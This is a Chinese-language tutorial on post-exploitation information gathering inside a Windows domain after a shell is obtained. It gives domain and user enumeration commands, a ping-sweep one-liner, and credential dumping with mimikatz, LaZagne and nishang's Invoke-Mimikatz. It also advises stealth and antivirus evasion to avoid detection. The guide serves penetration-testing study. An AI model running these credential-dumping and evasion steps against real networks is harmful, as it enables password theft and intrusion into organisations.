内网渗透-前期信息收集
概述
当我们渗透web端或者通过其他方式拿到某内网主机shell,我们就可以尝试开始内网渗透,也叫做后渗透,域渗透等,探索域内网络架构,通过内网渗透得到其他内网主机的权限,或者通过内网主机获取到同域的最高管理员主机权限等。
1.内网基本认知:各种名词认知,域的认知,大概了解内网安全流程
2.内网信息收集:
(1)内网主机的基本信息(版本,补丁,服务,任务,防护…),
(2)网络信息(端口,环境,代理通道…),
(3)用户信息(域用户,本地用户,用户权限,组信息…),
(4)凭据信息(各种储存的协议账号密码信息,各种口令信息,hash…)
3.后续探针信息:探索到域内的网络架构信息,存活主机,域控信息,服务接口…
内网相关概念这里不再进行介绍,大家可以参考我之前发的文章内网渗透-域环境基础,诸如什么是域、域与工作组的区别、什么是DC、什么是AD等。当然,概念是生涩难懂的,结合实际环境会有助于理解,
Tips:本次讲解的是基于Windows环境下的信息收集,后续会讲解Linux环境下信息收集操作
主机详细信息收集
通过web获取权限拿到主机权限后,应了解当前服务器的计算机基本信息,为后续判断服务器角色,网络环境等做好准备
-
systeminfo
获取当前主机名称,打了哪些补丁等详细信息
-
net start
获取当前主机启动的服务
-
tasklist
查看进程列表
网络信息收集
了解当前服务器的网络接口信息,判断是否在域环境下,判断当前角色,功能,网络架构做准备
-
ipconfig/all
查看当前主机网络IP信息,以及判断存在域-DNS
-
net view /domain
判断存在域
-
net time /domain
判断主域
-
netstat -ano
查看当前主机网络端口开放
-
nslookup
域名 可追踪来源地址,以及判断域控IP
用户信息收集
了解在当前计算机或域环境下的用户及用户组信息,便于后期利用凭据进行测试
系统默认常见用户身份:
Domain Admins:域管理员(默认对域控制器有完全控制权)
Domain Computers:域内机器
Domain Controllers:域控制器
Domain Guest:域访客,权限低
Domain Users:域用户
Enterprise Admins:企业系统管理员用户(默认对域控制器有完全控制权)
相关用户收集操作命令:
-
whoami /all:查看用户权限
-
net config workstaion:登录信息
-
net user:查看本地用户
后续的自行进行测试~
- net localgroup 本地用户组
- net user /domain 获取域用户信息
- net group /domain 获取域用户组信息
- wmic useraccount get /all 涉及域用户详细信息
- net group “Domain Admins” /domain 查询域管理员账户
- net group “Enterprise Admins” /domain 查询管理员用户组
- net group “Domain Controllers” /domain 查询域控制器
凭据信息收集
收集主机上各种密文,明文,口令等,为后续横向渗透测试做好测试准备
计算机用户HASH,明文获取-minikatz(win),mimipenguin(linux)
minikatz
使用教程:
下载地址:https://github.com/gentilkiwi/mimikatz/releases
下载后是个exe文件加载到主机上
分为x64,和32位主机
打开exe界面:输入以下两条指令进行执行
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
README文件里有使用教程
执行成功后 可以看到账号密码以明文形式显现出来了
注意:部分拿到web权限后执行该文件会爆出该错误
解决方式:获取到的主机需要提权到system权限或administrator权限即可成功执行
前期提权的重要性,部分会报错账号密码是空的情况
mimipenguin(linux)
linux下检测工具,该工具兼容性不全,只适用与linux,权限不是root将无法执行
下载地址:https://github.com/huntergregal/mimipenguin/releases/
协议服务口令信息收集
计算机各种协议服务口令获取-Lazagne(all),XenArmor(win)
1.站点源码备份文件、数据库备份文件等
2.各类数据库Web管理入口,如PHPMyAdmin
3.浏览器保存密码、浏览器Cookies
4.其他用户会话、3389和ipc$连接记录、回收站内容
5.Windows 保存的WIFI密码
6.网络内部的各种帐号和密码,如:Email、VPN、FTP、OA等
Lazagne
该工具兼容任何系统(win/linux/mac) 推荐该工具
下载地址:https://github.com/AlessandroZ/LaZagne
下载该windows exe文件后,拖入到cmd命令行进行执行
列出了需要查看的文件密码,一般都是直接all全选
执行成功,可以看到历史的wifi,浏览器保存密码,各种口令,为后期渗透提高了更多手段
探针内网信息收集
探针主机域控架构服务操作演示
为后续横向思路做准备,针对应用,协议等各类攻击手法
探针域内存活主机及IP地址信息
注意:使用工具容易被运维容易发现,建议使用自带命令
netbios
下载地址:http://www.unixwiz.net/tools/nbtscan.html
将下载后的exe文件拖入cmd执行 输入要扫描的网段
该工具目前容易被查杀,不建议使用
自带命令
推荐使用自带命令,不会被发现
for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.3.%I | findstr "TTL="
在cmd中执行
成功探测到存活主机
nmap/msscan第三方工具
蓝队如有APT,态势感知等设备,容易被发现,不建议使用
nishang/PowerShell脚本
该工具为集成一体化工具/包含minikatz的所有功能,推荐使用
下载地址:https://github.com/samratashok/nishang
下载后通过PowerShell命令行进行导入模块
Import-Module .\nishang.psm1
设置执行策略
Set-ExecutionPolicy RemoteSigned
获取模块nishang的命令函数
Get-Command -Module nishang
可以看到nishang支持的功能
minikatz也包含在里面
执行只需要对应的命令即可
Invoke-Mimikatz
密码全部出来了
获取常规计算机信息
Get-Information
端口扫描(查看目录对应文件有演示语法,其他同理)
Invoke-PortScan -StartAddress 192.168.3.0 -EndAddress 192.168.3.100 -ResolveHost -ScanPort
#其他功能:删除补丁,反弹Shell,凭据获取等
探针域内主机角色及服务信息
利用开放端口服务及计算机名判断
核心业务机器:
1.高级管理人员、系统管理员、财务/人事/业务人员的个人计算机
2.产品管理系统服务器
3.办公系统服务器
4.财务应用系统服务器
5.核心产品源码服务器(自建SVN、GIT)
6.数据库服务器
7.文件或网盘服务器、共享服务器
8.电子邮件服务器
9.网络监控系统服务器
10.其他服务器(内部技术文档服务器、其他监控服务器等)
总结
一、本次讲的前期信息收集环节利用条件放在现实中利用比较苛刻(比较安全厂商的设备也不是吃白饭的)基本都能检测到流量,学习个内网前期信息收集思路即可
二、嫌麻烦的可以使用一些市面常见的工具,做免杀处理可以达到很好的效果,如Ladon、CS、等其他工具